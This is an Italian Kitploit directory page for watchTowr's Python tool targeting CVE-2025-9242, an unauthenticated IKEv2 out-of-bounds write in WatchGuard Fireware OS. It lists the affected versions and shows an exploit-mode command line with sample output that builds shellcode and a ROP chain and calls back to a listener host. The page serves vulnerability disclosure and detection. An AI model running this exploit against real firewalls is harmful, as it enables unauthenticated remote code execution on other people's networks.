Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
watchTowr-vs-WatchGuard-CVE-2025-9242 — Generatore di artefatti di rilevamento basato su Python ed exploit per WatchGuard Fireware OS CVE-2025-9242, una vulnerabilità di scrittura fuori dai limiti IKEv2 non autenticata. Automatizza il fingerprinting della versione, la verifica della vulnerabilità, la costruzione del payload shellcode e l'esecuzione della catena ROP. | Kitploit
Strumenti/GitHubGitHub/watchtowrlabs/watchtowr-vs-watchguard-cve-2025-9242
Generazione di PayloadAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingBinary Exploitation
GitHubwatchtowrlabs/watchtowr-vs-watchguard-cve-2025-9242

watchTowr-vs-WatchGuard-CVE-2025-9242

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
13536 mesi faNon ancora revisionato

Informazioni

Generatore di artefatti di rilevamento basato su Python ed exploit per WatchGuard Fireware OS CVE-2025-9242, una vulnerabilità di scrittura fuori dai limiti IKEv2 non autenticata. Automatizza il fingerprinting della versione, la verifica della vulnerabilità, la costruzione del payload shellcode e l'esecuzione della catena ROP.

Condividi

watchTowr-vs-WatchGuard-CVE-2025-9242

Generatore di artefatti di rilevamento per WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

Per i dettagli tecnici, consulta il nostro post sul blog

Rilevamento in azione

root@kitploit:~
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]


[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337

Descrizione

Questo script tenta di rilevare se il sistema operativo WatchGuard è vulnerabile a CVE-2025-9242.

Versioni interessate

Le seguenti versioni di WatchGuard OS sono interessate:

Versione vulnerabileVersione risolta
2025.12025.1.1
12.x12.11.4
12.5.x (modelli T15 e T35)12.5.13
12.3.1 (release certificata FIPS)12.3.1_Update3 (B722811)
11.xFine del ciclo di vita

Per maggiori informazioni visita WatchGuard Firebox iked Out of Bounds Write Vulnerability

Segui watchTowr Labs

Per le ultime ricerche di sicurezza, segui il team watchTowr Labs

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

Scarica lo strumento